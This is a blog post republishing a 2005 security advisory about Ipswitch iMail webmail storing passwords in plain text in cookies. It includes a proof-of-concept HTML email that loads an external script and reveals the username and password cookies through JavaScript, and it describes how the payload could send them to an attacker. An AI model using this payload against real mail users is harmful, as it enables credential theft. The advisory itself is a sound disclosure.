You are hereipswitch iMail webmail: XSS and cookie password vulnerability / Reply to comment

Reply to comment

ipswitch iMail webmail: XSS and cookie password vulnerability

By chri - Posted on 18 October 2008

While cleaning up my computer I found this advisory lying around.
It was discovered around June 2005 while studying at Groep T. At that time we didn't really know the XSS principles so we didn't report it as such, but as a simple cookie vulnerability.

IPswitch didn't fix the problems as they were 'working on a complete new version'. We did report it to cert.org.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Security Advisory
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  Severity: High
     Title: ipswitch iMail webmail: cookie password vulnerability
      Date: June 08, 2005
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Credits
=======

Peter Bulckens
Christophe Vandeplas


Description
===========

Due to the plain text storage of the user password in a cookie an
attacker can fetch the password using client-side scripting methods like
javascript contained in the html of the mail.
This vulnerability can be classed as high severity due to the fact that
the exploit can be performed without the victim noticing it.


Proof of Concept
================
--[ Structure Description

The malicious mail should not contain any  nor  tag, but
should be declared as a text/html content type.

To circumvent the internal scripting protection of the webmail the
script should not be embedded in the email, an external script should be
used instead.

When hovering over the document, the password will popup on the screen.
If the source is changed adequately the script could call an url with
the username and password as arguments to add the data into the
attacker's password database, without the victim noticing it.

--[ Email Source

Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
Subject: ipswitch iMail webmail: cookie password vulnerability

<script type="text/javascript"
src="http://www.netspade.com/articles/javascript/cookies.js"></script>
<div href="#" onmouseover="alert(getCookie('myICalUserName') + ' '
+getCookie('myICalPassword'))">
&nbsp; <br>
Vulnerability discovered by Peter Bulckens &
Christophe Vandeplas&nbsp; <br>
&nbsp; <br>
</div>
Tags

Reply

The content of this field is kept private and will not be shown publicly.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <img> <pre> <p>
  • Lines and paragraphs break automatically.

More information about formatting options

I Love Belgium... and you?

About Me
GnuPG Public Key Still More LinkedIn profile
Photos
Projects
WeIDS 2.0 Linux Lessons WiFi Auth Project
Documentation
Acer Aspire 2012 WLMi Acer TM 4002 WLMi IR-receiver (Win)(NL)
Links
Ubuntu Belgium Planet Grep
FOSDEM Profoss hacker emblem www.cacert.org
Get OpenOffice Get Firefox Get Thunderbird
What is OpenID?